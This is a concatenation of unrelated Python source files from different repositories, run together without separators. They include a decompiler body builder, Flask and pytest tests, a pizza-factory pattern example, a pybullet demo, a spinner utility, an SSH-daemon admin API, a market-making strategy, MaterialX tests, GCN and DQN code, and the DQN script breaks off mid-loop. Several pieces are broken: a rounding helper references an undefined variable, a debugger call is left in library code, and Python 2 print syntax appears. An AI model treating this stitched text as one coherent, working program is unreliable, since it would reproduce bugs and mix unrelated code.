context.flow_graph.terminal_node() is_reducible = context.flow_graph.is_reducible() if options.debug: print("Here's the whole function!\n") # Label switch nodes switch_nodes = [n for n in context.flow_graph.nodes if isinstance(n, SwitchNode)] if len(switch_nodes) == 1: # There is only one switch in this function (no need to label) context.switch_nodes[switch_nodes[0]] = 0 else: for i, switch_node in enumerate(switch_nodes): context.switch_nodes[switch_node] = i + 1 body: Body if options.ifs and is_reducible: body = build_flowgraph_between(context, start_node, terminal_node) body.elide_empty_returns() else: body = Body(print_node_comment=context.options.debug) if options.ifs and not is_reducible: body.add_comment( "Flowgraph is not reducible, falling back to gotos-only mode." ) body.extend(build_naive(context, context.flow_graph.nodes)) # Check no nodes were skipped: build_flowgraph_between should hit every node in # well-formed (reducible) graphs; and build_naive explicitly emits every node unemitted_nodes = ( set(context.flow_graph.nodes) - context.emitted_nodes - {context.flow_graph.terminal_node()} ) for node in unemitted_nodes: if isinstance(node, ReturnNode) and not node.is_real(): continue body.add_comment( f"bug: did not emit code for node #{node.name()}; contents below:" ) emit_node(context, node, body) return body def get_function_text(function_info: FunctionInfo, options: Options) -> str: fmt = options.formatter() context = Context(flow_graph=function_info.flow_graph, options=options, fmt=fmt) body: Body = build_body(context, options) function_lines: List[str] = [] fn_name = function_info.stack_info.function.name arg_strs = [] for i, arg in enumerate(function_info.stack_info.arguments): if i == 0 and function_info.stack_info.replace_first_arg is not None: original_name, original_type = function_info.stack_info.replace_first_arg arg_strs.append(original_type.to_decl(original_name, fmt)) else: arg_strs.append(arg.type.to_decl(arg.format(fmt), fmt)) if function_info.stack_info.is_variadic: arg_strs.append("...") arg_str = ", ".join(arg_strs) or "void" fn_header = f"{fn_name}({arg_str})" if context.is_void: fn_header = f"void {fn_header}" else: fn_header = function_info.return_type.to_decl(fn_header, fmt) whitespace = "\n" if fmt.coding_style.newline_after_function else " " function_lines.append(f"{fn_header}{whitespace}{{") any_decl = False with fmt.indented(): local_vars = function_info.stack_info.local_vars # GCC's stack is ordered low-to-high (e.g. `int sp10; int sp14;`) # IDO's stack is ordered high-to-low (e.g. `int sp14; int sp10;`) if options.compiler == Options.CompilerEnum.IDO: local_vars = local_vars[::-1] for local_var in local_vars: type_decl = local_var.toplevel_decl(fmt) if type_decl is not None: function_lines.append(SimpleStatement(f"{type_decl};").format(fmt)) any_decl = True # With reused temps (no longer used), we can get duplicate declarations, # hence the use of a set here. temp_decls = set() for temp_var in function_info.stack_info.temp_vars: if temp_var.need_decl(): expr = temp_var.expr type_decl = expr.type.to_decl(expr.var.format(fmt), fmt) temp_decls.add(f"{type_decl};") any_decl = True for decl in sorted(temp_decls): function_lines.append(SimpleStatement(decl).format(fmt)) for phi_var in function_info.stack_info.phi_vars: type_decl = phi_var.type.to_decl(phi_var.get_var_name(), fmt) function_lines.append(SimpleStatement(f"{type_decl};").format(fmt)) any_decl = True for reg_var in function_info.stack_info.reg_vars.values(): if reg_var.reg not in function_info.stack_info.used_reg_vars: continue type_decl = reg_var.type.to_decl(reg_var.format(fmt), fmt) function_lines.append(SimpleStatement(f"{type_decl};").format(fmt)) any_decl = True # Create a variable to cast the original first argument to the assumed type if function_info.stack_info.replace_first_arg is not None: assert len(function_info.stack_info.arguments) >= 1 replaced_arg = function_info.stack_info.arguments[0] original_name, original_type = function_info.stack_info.replace_first_arg lhs = replaced_arg.type.to_decl(replaced_arg.format(fmt), fmt) rhs = f"({replaced_arg.type.format(fmt)}) {original_name}" function_lines.append(SimpleStatement(f"{lhs} = {rhs};").format(fmt)) if any_decl: function_lines.append("") function_lines.append(body.format(fmt)) function_lines.append("}") full_function_text: str = "\n".join(function_lines) return full_function_text jeremyschlatter/vaccine-feed-ingest-schema from importlib import reload import pydantic.error_wrappers import pytest from .common import collect_existing_subclasses DEPRECATION_SNIPPET = "vaccine_feed_ingest_schema.schema is deprecated." def test_warn_on_import(): with pytest.warns(DeprecationWarning, match=DEPRECATION_SNIPPET): from vaccine_feed_ingest_schema import schema # Depending on the order in which tests run, the above import may be # skipped. Reload it so that we trigger the warning, if it exists. reload(schema) @pytest.mark.filterwarnings(f"ignore: {DEPRECATION_SNIPPET}") def test_has_expected_classes(): from vaccine_feed_ingest_schema import schema expected = { "Address", "LatLng", "Contact", "OpenDate", "OpenHour", "Availability", "Vaccine", "Access", "Organization", "Link", "Source", "NormalizedLocation", "ImportMatchAction", "ImportSourceLocation", } existing = collect_existing_subclasses(schema, pydantic.BaseModel) missing = expected - existing assert not missing, "Expected pydantic schemas are missing" extra = existing - expected assert not extra, "Extra pydantic schemas found. Update this test." @pytest.mark.filterwarnings(f"ignore: {DEPRECATION_SNIPPET}") def test_raises_on_invalid_location(): from vaccine_feed_ingest_schema import schema with pytest.raises(pydantic.error_wrappers.ValidationError): schema.NormalizedLocation() # -*- coding: utf-8 -*- import json import uuid from datetime import datetime from unittest import mock from flask import url_for from pytest_flask.fixtures import client from tilty_dashboard import socketio def test_app(app): """Test to make sure the app is loading properly.""" assert app def test_index(client): """Test that the index works.""" assert client.get(url_for('index')).status_code == 200 def test_device_config( client ): """Test that the device config works.""" with mock.patch("builtins.open", mock.mock_open(read_data=b'data')) as mock_file: assert client.get(url_for('device_config')).status_code == 200 assert mock_file.mock_calls[0] == mock.call('/etc/tilty/tilty.ini', 'r') def test_dashboard_settings(client): """Test that the dashboard settings works.""" assert client.get(url_for('dashboard_settings')).status_code == 200 def test_save_device_config( app, ): with mock.patch("builtins.open", mock.mock_open(read_data=b'data')) as mock_file: test_client = app.test_client() socketio_test_client = socketio.test_client( app, flask_test_client=test_client ) assert socketio_test_client.is_connected() assert test_client.get(url_for('index')).status_code == 200 socketio_test_client.emit( 'save device config', { 'data': { 'config': 'foo', } } ) assert socketio_test_client.get_received() == [] def test_save_settings( app, ): test_client = app.test_client() socketio_test_client = socketio.test_client( app, flask_test_client=test_client ) assert socketio_test_client.is_connected() assert test_client.get(url_for('index')).status_code == 200 socketio_test_client.emit( 'save dashboard settings', { 'settings': { 'gravity_meas': 'Brix', 'gravity_offset': '', 'temp_meas': 'Fahrenheit', } } ) assert socketio_test_client.get_received() == [] def test_refresh( app, ): test_client = app.test_client() socketio_test_client = socketio.test_client( app, flask_test_client=test_client ) assert socketio_test_client.is_connected() assert test_client.get(url_for('index')).status_code == 200 socketio_test_client.emit('refresh') assert socketio_test_client.get_received() == [ { 'name': 'refresh', 'args': [{ 'data': [], }], 'namespace': '/' } ] def test_logs( app, ): test_client = app.test_client() socketio_test_client = socketio.test_client( app, flask_test_client=test_client ) with mock.patch("builtins.open", mock.mock_open(read_data=b"data")) as mock_file: assert socketio_test_client.is_connected() assert test_client.get(url_for('logs')).status_code == 200 socketio_test_client.emit('logs') assert socketio_test_client.get_received() == [ { 'name': 'logs', 'args': [{'data': b'data'}], 'namespace': '/' } ] gama79530/DesignPattern """ # All classes should extend PizzaStore and override the following methods def createPizza(self) : """ import PizzaIngredientsFactory import Pizza class PizzaStore : def createPizza(self, pizza_type) : assert False, 'This method should be overrided.' def orderPizza(self, pizza_type) : pizza = self.createPizza(pizza_type) pizza.prepare() pizza.bake() pizza.cut() pizza.box() return pizza class ChicagoPizzaStore(PizzaStore) : def createPizza(self, pizza_type) : pizza = None ingredientFactory = PizzaIngredientsFactory.ChicagoPizzaIngredientFactory() if pizza_type == 'cheese' : pizza = Pizza.CheesePizza(ingredientFactory) pizza.name = 'Chicago Style Cheese Pizza' elif pizza_type == 'veggie' : pizza = Pizza.VeggiePizza(ingredientFactory) pizza.name = 'Chicago Style Veggie Pizza' elif pizza_type == 'clam' : pizza = Pizza.ClamPizza(ingredientFactory) pizza.name = 'Chicago Style Clam Pizza' elif pizza_type == 'pepperoni' : pizza = Pizza.PepperoniPizza(ingredientFactory) pizza.name = 'Chicago Style Pepperoni Pizza' return pizza class NYPizzaStore(PizzaStore) : def createPizza(self, pizza_type) : pizza = None ingredientFactory = PizzaIngredientsFactory.NYPizzaIngredientFactory() if pizza_type == 'cheese' : pizza = Pizza.CheesePizza(ingredientFactory) pizza.name = 'New York Style Cheese Pizza' elif pizza_type == 'veggie' : pizza = Pizza.VeggiePizza(ingredientFactory) pizza.name = 'New York Style Veggie Pizza' elif pizza_type == 'clam' : pizza = Pizza.ClamPizza(ingredientFactory) pizza.name = 'New York Style Clam Pizza' elif pizza_type == 'pepperoni' : pizza = Pizza.PepperoniPizza(ingredientFactory) pizza.name = 'New York Style Pepperoni Pizza' return pizzastolk/bullet31-10 import pybullet as p from time import sleep physicsClient = p.connect(p.GUI) useDeformable = True if useDeformable: p.resetSimulation(p.RESET_USE_DEFORMABLE_WORLD) gravZ=-10 p.setGravity(0, 0, gravZ) planeOrn = [0,0,0,1]#p.getQuaternionFromEuler([0.3,0,0]) planeId = p.loadURDF("plane.urdf", [0,0,-2],planeOrn) boxId = p.loadURDF("cube.urdf", [0,1,2],useMaximalCoordinates = True) clothId = p.loadSoftBody("bunny.obj", basePosition = [0,0,2], scale = 0.5, mass = 1., useNeoHookean = 0, useBendingSprings=1, useMassSpring=1, springElasticStiffness=100, springDampingStiffness=.001, useSelfCollision = 0, frictionCoeff = .5, useFaceContact=1) p.setTimeStep(0.0005) p.setRealTimeSimulation(1) while p.isConnected(): p.setGravity(0,0,gravZ) sleep(1./240.) crunchex/py-spin100-1000 #!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import absolute_import, print_function import sys import time from functools import wraps from concurrent.futures import ThreadPoolExecutor # For python 2/3 compatible. if sys.version_info.major == 2: text_type = unicode else: text_type = str Box1 = u'⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏' Box2 = u'⠋⠙⠚⠞⠖⠦⠴⠲⠳⠓' Box3 = u'⠄⠆⠇⠋⠙⠸⠰⠠⠰⠸⠙⠋⠇⠆' Box4 = u'⠋⠙⠚⠒⠂⠂⠒⠲⠴⠦⠖⠒⠐⠐⠒⠓⠋' Box5 = u'⠁⠉⠙⠚⠒⠂⠂⠒⠲⠴⠤⠄⠄⠤⠴⠲⠒⠂⠂⠒⠚⠙⠉⠁' Box6 = u'⠈⠉⠋⠓⠒⠐⠐⠒⠖⠦⠤⠠⠠⠤⠦⠖⠒⠐⠐⠒⠓⠋⠉⠈' Box7 = u'⠁⠁⠉⠙⠚⠒⠂⠂⠒⠲⠴⠤⠄⠄⠤⠠⠠⠤⠦⠖⠒⠐⠐⠒⠓⠋⠉⠈⠈' Spin1 = u'|/-\\' Spin2 = u'◴◷◶◵' Spin3 = u'◰◳◲◱' Spin4 = u'◐◓◑◒' Spin5 = u'▉▊▋▌▍▎▏▎▍▌▋▊▉' Spin6 = u'▌▄▐▀' Spin7 = u'╫╪' Spin8 = u'■□▪▫' Spin9 = u'←↑→↓' Default = Box1 class Spinner(object): def __init__(self, frames): self.frames = frames self.length = len(frames) self.position = 0 def current(self): return self.frames[self.position] def next(self): current_frame = self.current() self.position = (self.position + 1) % self.length return text_type(current_frame) def reset(self): self.position = 0 def make_spin(spin_style=Default, words="", ending="\n"): spinner = Spinner(spin_style) def decorator(func): @wraps(func) def wrapper(*args, **kwargs): with ThreadPoolExecutor(max_workers=1) as executor: future = executor.submit(func, *args, **kwargs) while future.running(): print(text_type("\r{0} {1}").format(spinner.next(), words), end="") sys.stdout.flush() time.sleep(0.1) print(ending, end="") return future.result() return wrapper return decorator 1-10 import logging from ..lib import FileSystem, CryptoServices from ..common import Object from .base_command import BaseCommand class SSH(BaseCommand): """ Edge Filer SSH daemon APIs """ def enable(self, public_key=None, public_key_file=None, exponent=65537, key_size=2048): """ Enable the Edge Filer's SSH daemon :param str,optional public_key: A PEM-encoded public key in OpenSSH format. If neither a public key nor public key file were specified, an RSA key pair will be generated automatically. The PEM-encoded private key will be saved to the default Downloads directory :param str,optional public_key_file: A path to the public key file :param int,optional exponent: The public exponent of the new key, defaults to `65537` :param int,optional key_size: The length of the modulus in bits, defaults to `2048` """ param = Object() if public_key is None: if public_key_file is not None: FileSystem.instance().get_local_file_info(public_key_file) with open(public_key_file, 'r', encoding='utf-8') as f: public_key = f.read() else: public_key = CryptoServices.generate_and_save_key_pair(self._gateway.host(), exponent=exponent, key_size=key_size) param.publicKey = public_key logging.getLogger().info("Enabling SSH daemon.") self._gateway.execute('/config/device', 'startSSHD', param) logging.getLogger().info("SSH daemon enabled.") def disable(self): logging.getLogger().info("Disabling SSH daemon.") self._gateway.execute('/config/device', 'stopSSHD') logging.getLogger().info("SSH daemon disabled.") examples/backtesting/strategies/as_strategy.py from vnpy.app.cta_strategy import ( CtaTemplate, StopOrder, TickData, BarData, TradeData, OrderData, BarGenerator, ArrayManager, ) import time, datetime import math class AsStrategy(CtaTemplate): k = 0.1 sigma = 1 gamma = 0.5 fixed_size = 1000 delta_t = 0 r = 0 spread = 0 bid_price = 0 ask_price = 0 last_bid_price = 0 last_ask_price = 0 milli_second_per_day = 86400000 cover_only_milli = 1000 * 60 * 15 cover_only_request = 400 vt_orderids = [] last_tick = None parameters = [ "k", "sigma", "gamma", "fixed_size", "cover_only_milli", "cover_only_request", ] variables = [ "delta_t", "r", "spread", "bid_price", "ask_price" ] def __init__(self, cta_engine, strategy_name, vt_symbol, setting): """""" super().__init__(cta_engine, strategy_name, vt_symbol, setting) self.request_counter = 0 self.last_now = datetime.datetime.now() def on_init(self): """ Callback when strategy is inited. """ self.write_log("策略初始化") self.load_tick(0) print("k: "+str(self.k)) print("gamma: "+ str(self.gamma)) print("sigma: "+ str(self.sigma)) print("request limit: "+ str(self.cover_only_request)) def on_start(self): """ Callback when strategy is started. """ self.write_log("策略start") def on_stop(self): """ Callback when strategy is stopped. """ self.write_log("策略停止") @classmethod def remain_milli_today(cls, now): milli_sec_now = int(round(now.timestamp() * 1000)) zeroToday = now - datetime.timedelta(hours=now.hour, minutes=now.minute, seconds=now.second, microseconds=now.microsecond) milli_sec_endtime = int(round(zeroToday.timestamp()*1000)) + cls.milli_second_per_day remain_time = milli_sec_endtime - milli_sec_now return remain_time def new_minute(self, now): if now.minute != self.last_now.minute: return True return False def force_cover(self): pass def out_of_request_limit(self): if self.request_counter > self.cover_only_request: # print("out of request!! called: {}, limit: {}".format(self.request_counter, self.cover_only_request)) return True return False def end_of_day(self, remain_time): if remain_time < self.cover_only_milli: return True return False def on_tick(self,tick: TickData): """ Callback of new tick data update. """ #get position: self.pos #calculate time left (T-t) delta_t now = tick.datetime if self.new_minute(now): self.request_counter = 0 self.last_now = now remain_time = self.remain_milli_today(now) if self.end_of_day(remain_time) or self.out_of_request_limit(): cover_only = True else: cover_only = False self.delta_t = remain_time / self.milli_second_per_day #calculate indifferent price r(s,t) = s - q * gamma * sigma^2 * delta_t self.r = (tick.ask_price_1 + tick.bid_price_1)/2 - self.pos * self.gamma * self.sigma**2 * self.delta_t #calculate spread, spread = 2 / gamma * ln(1 + gamma/k) self.spread = self.gamma * self.sigma**2 * self.delta_t + 2 / self.gamma * math.log(1 + self.gamma / self.k) #calculate ask, ask_price = r + spread/2 #calculate bid, bid_price = r - spread/2 self.ask_price = self.round_up(self.r + self.spread/2, self.get_pricetick) self.bid_price = self.round_down(self.r - self.spread/2, self.get_pricetick) #如果上个tick提交的委托没成交 if self.vt_orderids: #新tick的bid ask和上个tick不变,返回 if(self.bid_price == self.last_bid_price and self.ask_price == self.last_ask_price): return #新tick的bid ask发生变化,撤旧单,发新单 else: for orderid in self.vt_orderids: self.cancel_remove_order(orderid) self.send_new_order(cover_only=cover_only) else: self.send_new_order(cover_only=cover_only) self.last_ask_price = self.ask_price self.last_bid_price = self.bid_price self.write_log("{}\n delta_t: {}, spread: {}, r: {}, request counter: {}".format(tick, self.delta_t, self.spread, self.r, self.request_counter)) # self.last_tick = tick @staticmethod def round_up(price, price_tick): reminder = price % price_tick rounded = x + price_tick - reminder return rounded @staticmethod def round_down(price, price_tick): rounded = price // price_tick * price_tick return rounded def on_order(self, order: OrderData): """ Callback of new order data update. """ pass def on_trade(self, trade: TradeData): """ Callback of new trade data update. """ if trade.vt_orderid in self.vt_orderids: self.vt_orderids.remove(trade.vt_orderid) self.write_log(" order filled {}".format(trade)) def cancel_remove_order(self, orderid): self.cancel_order(orderid) self.vt_orderids.remove(orderid) self.request_counter += 1 # def force_cover(self): # if self.pos = 0: # return # elif self.pos > 0: # self.sell(self.pos) def send_new_order(self, cover_only=False): if self.pos == 0 and not cover_only: vt_orderids = self.buy(self.bid_price, self.fixed_size) self.vt_orderids.extend(vt_orderids) vt_orderids = self.short(self.ask_price, self.fixed_size) self.vt_orderids.extend(vt_orderids) self.request_counter += 2 elif self.pos > 0: if not cover_only: vt_orderids = self.buy(self.bid_price, self.fixed_size) self.vt_orderids.extend(vt_orderids) self.request_counter += 1 vt_orderids = self.sell(self.ask_price, self.fixed_size) self.vt_orderids.extend(vt_orderids) self.request_counter += 1 elif self.pos < 0: if not cover_only: vt_orderids =self.short(self.ask_price, self.fixed_size) self.vt_orderids.extend(vt_orderids) self.request_counter += 1 vt_orderids = self.cover(self.bid_price, self.fixed_size) self.vt_orderids.extend(vt_orderids) self.request_counter += 1 chen2qu/USD #!/pxrpythonsubst # # Copyright 2018 Pixar # # Licensed under the Apache License, Version 2.0 (the "Apache License") # with the following modification; you may not use this file except in # compliance with the Apache License and the following modification to it: # Section 6. Trademarks. is deleted and replaced with: # # 6. Trademarks. This License does not grant permission to use the trade # names, trademarks, service marks, or product names of the Licensor # and its affiliates, except as required to comply with Section 4(c) of # the License and to reproduce the content of the NOTICE file. # # You may obtain a copy of the Apache License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the Apache License with the above modification is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the Apache License for the specific # language governing permissions and limitations under the Apache License. from pxr import Tf, Usd, UsdMtlx import unittest def _EmptyLayer(): stage = Usd.Stage.CreateInMemory() return stage.GetRootLayer().ExportToString() class TestFileFormat(unittest.TestCase): def test_EmptyFile(self): """ Verify that an empty MaterialX document fails. """ with self.assertRaises(Tf.ErrorException) as e: UsdMtlx._TestString('') def test_MissingFile(self): """ Verify that a missing MaterialX file fails. """ with self.assertRaises(Tf.ErrorException) as e: UsdMtlx._TestFile('non-existent-file.xml') def test_BadMagic(self): """ Verify that a MaterialX file with a bad XML header fails. """ with self.assertRaises(Tf.ErrorException) as e: UsdMtlx._TestString('''''') def test_EmptyXMLDocument(self): """ Verify that a MaterialX file with only an XML header fails. """ with self.assertRaises(Tf.ErrorException) as e: UsdMtlx._TestString('''''') def test_MissingMaterialXDocument(self): """ Verify that a MaterialX file without a materialx element is okay. """ stage = UsdMtlx._TestString( ''' ''') self.assertEqual(stage.GetRootLayer().ExportToString(), _EmptyLayer()) def test_EmptyMaterialXDocument(self): """ Verify that a file with an empty a materialx element is okay. """ stage = UsdMtlx._TestString( ''' ''') self.assertEqual(stage.GetRootLayer().ExportToString(), _EmptyLayer()) def test_DuplicateName(self): """ Verify that a MaterialX file with duplicate element names fails. """ with self.assertRaises(Tf.ErrorException) as e: UsdMtlx._TestString( ''' ''') def test_Cycle(self): """ Verify that a MaterialX file with an inherits cycle fails. """ with self.assertRaises(Tf.ErrorException) as e: UsdMtlx._TestString( ''' ''') def test_NodeGraphs(self): """ Test general MaterialX node graph conversions. """ stage = UsdMtlx._TestFile('NodeGraphs.mtlx', nodeGraphs=True) with open('NodeGraphs.usda', 'w') as f: print >>f, stage.GetRootLayer().ExportToString() def test_Looks(self): """ Test general MaterialX look conversions. """ stage = UsdMtlx._TestFile('Looks.mtlx') with open('Looks.usda', 'w') as f: print >>f, stage.GetRootLayer().ExportToString() if __name__ == '__main__': unittest.main() # Copyright 2021 DAI Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from marshmallow import Schema, fields class PayloadTransactionSchema(Schema): """ POST Payload Transaction Metadata Schema. """ chain_id = fields.String(required=True) tx_hash = fields.String(required=True) block_number = fields.Integer(required=True) sender = fields.String(required=True) receiver = fields.String(required=False) timestamp = fields.Integer(required=True) gas_price = fields.Integer(required=True) transaction_index = fields.Integer(required=True) value = fields.Integer(required=True) gas_used = fields.Integer(required=False) status = fields.Boolean(required=True) pypeit/images/buildimage.py """ Uber object for calibration images, e.g. arc, flat .. include common links, assuming primary doc root is up one directory .. include:: ../links.rst """ import os import numpy as np from pypeit import msgs from pypeit.par import pypeitpar from pypeit.images import combineimage from pypeit.images import pypeitimage from pypeit.core import procimg from IPython import embed class ArcImage(pypeitimage.PypeItImage): """ Simple DataContainer for the Arc Image """ # Peg the version of this class to that of PypeItImage version = pypeitimage.PypeItImage.version # I/O output_to_disk = ('ARC_IMAGE', 'ARC_FULLMASK', 'ARC_DETECTOR') hdu_prefix = 'ARC_' # Master fun master_type = 'Arc' master_file_format = 'fits' class AlignImage(pypeitimage.PypeItImage): """ Simple DataContainer for the Arc Image """ # Peg the version of this class to that of PypeItImage version = pypeitimage.PypeItImage.version # I/O output_to_disk = ('ALIGN_IMAGE', 'ALIGN_FULLMASK', 'ALIGN_DETECTOR') hdu_prefix = 'ALIGN_' # Master fun master_type = 'Align' master_file_format = 'fits' class BiasImage(pypeitimage.PypeItImage): """ Simple DataContainer for the Tilt Image """ # Set the version of this class version = pypeitimage.PypeItImage.version # Output to disk output_to_disk = ('BIAS_IMAGE', 'BIAS_DETECTOR') hdu_prefix = 'BIAS_' master_type = 'Bias' master_file_format = 'fits' class DarkImage(pypeitimage.PypeItImage): """ Simple DataContainer for the Dark Image """ # Set the version of this class version = pypeitimage.PypeItImage.version # Output to disk output_to_disk = ('DARK_IMAGE', 'DARK_DETECTOR') hdu_prefix = 'DARK_' master_type = 'Dark' master_file_format = 'fits' class TiltImage(pypeitimage.PypeItImage): """ Simple DataContainer for the Tilt Image """ # Peg the version of this class to that of PypeItImage version = pypeitimage.PypeItImage.version # I/O output_to_disk = ('TILT_IMAGE', 'TILT_FULLMASK', 'TILT_DETECTOR') hdu_prefix = 'TILT_' # Master fun master_type = 'Tiltimg' master_file_format = 'fits' class TraceImage(pypeitimage.PypeItImage): """ Simple DataContainer for the Trace Image """ # Peg the version of this class to that of PypeItImage version = pypeitimage.PypeItImage.version # I/O output_to_disk = ('TRACE_IMAGE', 'TRACE_FULLMASK', 'TRACE_DETECTOR') hdu_prefix = 'TRACE_' class SkyRegions(pypeitimage.PypeItImage): """ Simple DataContainer for the SkyRegions Image """ # Peg the version of this class to that of PypeItImage version = pypeitimage.PypeItImage.version # I/O output_to_disk = ('SKYREG_IMAGE') hdu_prefix = 'SKYREG_' # Master fun master_type = 'SkyRegions' master_file_format = 'fits.gz' def buildimage_fromlist(spectrograph, det, frame_par, file_list, bias=None, bpm=None, dark=None, flatimages=None, sigma_clip=False, sigrej=None, maxiters=5, ignore_saturation=True, slits=None): """ Build a PypeItImage from a list of files (and instructions) Args: spectrograph (:class:`pypeit.spectrographs.spectrograph.Spectrograph`): Spectrograph used to take the data. det (:obj:`int`): The 1-indexed detector number to process. frame_par (:class:`pypeit.par.pypeitpar.FramePar`): Parameters that dictate the processing of the images. See :class:`pypeit.par.pypeitpar.ProcessImagesPar` for the defaults. file_list (list): List of files bpm (np.ndarray, optional): Bad pixel mask. Held in ImageMask bias (np.ndarray, optional): Bias image flatimages (:class:`pypeit.flatfield.FlatImages`, optional): For flat fielding sigrej (int or float, optional): Rejection threshold for sigma clipping. Code defaults to determining this automatically based on the numberr of images provided. maxiters (int, optional): ignore_saturation (bool, optional): Should be True for calibrations and False otherwise Returns: :class:`pypeit.images.pypeitimage.PypeItImage`: Or one of its children """ # Check if not isinstance(frame_par, pypeitpar.FrameGroupPar): msgs.error('Provided ParSet for must be type FrameGroupPar.') #process_steps = procimg.set_process_steps(bias, frame_par) # combineImage = combineimage.CombineImage(spectrograph, det, frame_par['process'], file_list) pypeitImage = combineImage.run(bias=bias, bpm=bpm, dark=dark, flatimages=flatimages, sigma_clip=sigma_clip, sigrej=sigrej, maxiters=maxiters, ignore_saturation=ignore_saturation, slits=slits, combine_method=frame_par['process']['combine']) # # Decorate according to the type of calibration # Primarily for handling MasterFrames # WARNING, any internals in pypeitImage are lost here if frame_par['frametype'] == 'bias': finalImage = BiasImage.from_pypeitimage(pypeitImage) elif frame_par['frametype'] == 'dark': finalImage = DarkImage.from_pypeitimage(pypeitImage) elif frame_par['frametype'] == 'arc': finalImage = ArcImage.from_pypeitimage(pypeitImage) elif frame_par['frametype'] == 'tilt': finalImage = TiltImage.from_pypeitimage(pypeitImage) elif frame_par['frametype'] == 'trace': finalImage = TraceImage.from_pypeitimage(pypeitImage) elif frame_par['frametype'] == 'align': finalImage = AlignImage.from_pypeitimage(pypeitImage) elif frame_par['frametype'] in ['pixelflat', 'science', 'standard', 'illumflat']: finalImage = pypeitImage else: finalImage = None embed(header='193 of buildimage') # Internals finalImage.process_steps = pypeitImage.process_steps finalImage.files = file_list finalImage.rawheadlist = pypeitImage.rawheadlist finalImage.head0 = pypeitImage.head0 # Return return finalImage 0 # -*- coding: utf-8 -*- from plone.testing import z2 from plone.testing import Layer class DRILayer(Layer): defaultBases = (z2.STARTUP,) def setUp(self): with z2.zopeApp() as app: z2.installProduct(app, 'Products.DateRecurringIndex') def tearDown(self): with z2.zopeApp() as app: z2.uninstallProduct(app, 'Products.DateRecurringIndex') DRI_FIXTURE = DRILayer() derekbt96/interop from auvsi_suas.views.login import Login from auvsi_suas.views.index import Index from auvsi_suas.views.missions import Evaluate from auvsi_suas.views.missions import ExportKml from auvsi_suas.views.missions import LiveKml from auvsi_suas.views.missions import LiveKmlUpdate from auvsi_suas.views.missions import Missions from auvsi_suas.views.missions import MissionsId from auvsi_suas.views.obstacles import Obstacles from auvsi_suas.views.odlcs import Odlcs from auvsi_suas.views.odlcs import OdlcsAdminReview from auvsi_suas.views.odlcs import OdlcsId from auvsi_suas.views.odlcs import OdlcsIdImage from auvsi_suas.views.teams import Teams from auvsi_suas.views.teams import TeamsId from auvsi_suas.views.telemetry import Telemetry from django.conf.urls import url from django.conf import settings from django.conf.urls.static import static app_name = 'auvsi_suas' # yapf: disable urlpatterns = [ url(r'^$', Index.as_view(), name='index'), url(r'^api/login$', Login.as_view(), name='login'), url(r'^api/missions$', Missions.as_view(), name='missions'), url(r'^api/missions/(?P\d+)$', MissionsId.as_view(), name='missions_id'), url(r'^api/missions/export\.kml$', ExportKml.as_view(), name='export_kml'), url(r'^api/missions/live\.kml$', LiveKml.as_view(), name='live_kml'), url(r'^api/missions/update\.kml$', LiveKmlUpdate.as_view(), name='update_kml'), url(r'^api/missions/evaluate\.zip$', Evaluate.as_view(), name='evaluate'), url(r'^api/obstacles$', Obstacles.as_view(), name='obstacles'), url(r'^api/odlcs$', Odlcs.as_view(), name='odlcs'), url(r'^api/odlcs/(?P\d+)$', OdlcsId.as_view(), name='odlcs_id'), url(r'^api/odlcs/(?P\d+)/image$', OdlcsIdImage.as_view(), name='odlcs_id_image'), url(r'^api/odlcs/review$', OdlcsAdminReview.as_view(), name='odlcs_review'), url(r'^api/odlcs/review/(?P\d+)$', OdlcsAdminReview.as_view(), name='odlcs_review_id'), url(r'^api/teams$', Teams.as_view(), name='teams'), url(r'^api/teams/(?P\d+)$', TeamsId.as_view(), name='teams_id'), url(r'^api/telemetry$', Telemetry.as_view(), name='telemetry'), ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) # yapf: enable # modified from https://github.com/tkipf/pygcn/blob/master/pygcn/layers.py import math import torch import torch.nn as nn from torch.nn.parameter import Parameter class GraphConvolution(nn.Module): """ Simple GCN layer, similar to https://arxiv.org/abs/1609.02907 """ def __init__(self, in_features, out_features, bias=True): super(GraphConvolution, self).__init__() self.in_features = in_features self.out_features = out_features self.weight = Parameter(torch.FloatTensor(in_features, out_features)) if bias: self.bias = Parameter(torch.FloatTensor(out_features)) else: self.register_parameter('bias', None) self.reset_parameters() self.bn = nn.BatchNorm1d(out_features) def reset_parameters(self): stdv = 1. / math.sqrt(self.weight.size(1)) self.weight.data.uniform_(-stdv, stdv) if self.bias is not None: self.bias.data.uniform_(-stdv, stdv) def forward(self, x, adj): support = torch.bmm(adj, x) result = torch.mm(support.view(-1, self.in_features), self.weight) output = result.view(-1, adj.data.shape[1], self.out_features) if self.bias is not None: output = output + self.bias output = output.transpose(1, 2).contiguous() output = self.bn(output) output = output.transpose(1, 2) return output def __repr__(self): return self.__class__.__name__ + ' (' \ + str(self.in_features) + ' -> ' \ + str(self.out_features) + ')' 1-10 import gym import numpy as np import collections from agent_dqn import Agent from nes_py.wrappers import JoypadSpace import gym_super_mario_bros from gym_super_mario_bros.actions import SIMPLE_MOVEMENT def rgb_to_gry(obs, dsr): x = np.asarray(np.around(obs[..., :3] @ [0.299, 0.587, 0.114] ), dtype=np.int8) return x[::dsr, ::dsr] env = gym_super_mario_bros.make('SuperMarioBros-1-1-v0') env = JoypadSpace(env, SIMPLE_MOVEMENT) frame_stack_len = 4 downsampling_ratio = 2 obs_dims = tuple([int(x/downsampling_ratio) for x in list(env.observation_space.shape[:2])]) gamma = 0.99 agent = Agent(gamma=gamma, eps=0.05, lr=0.0003, tau=0.0001, batch_size=64, max_mem=150*1000, obs_dim=obs_dims, frame_stack=frame_stack_len, n_actions=env.action_space.n) frame_stack = collections.deque(maxlen=frame_stack_len) x_stack = collections.deque(maxlen=90) save_freq = 100 step_size = 6 exp_id = 0 training_steps = 0 while training_steps<=5e5: 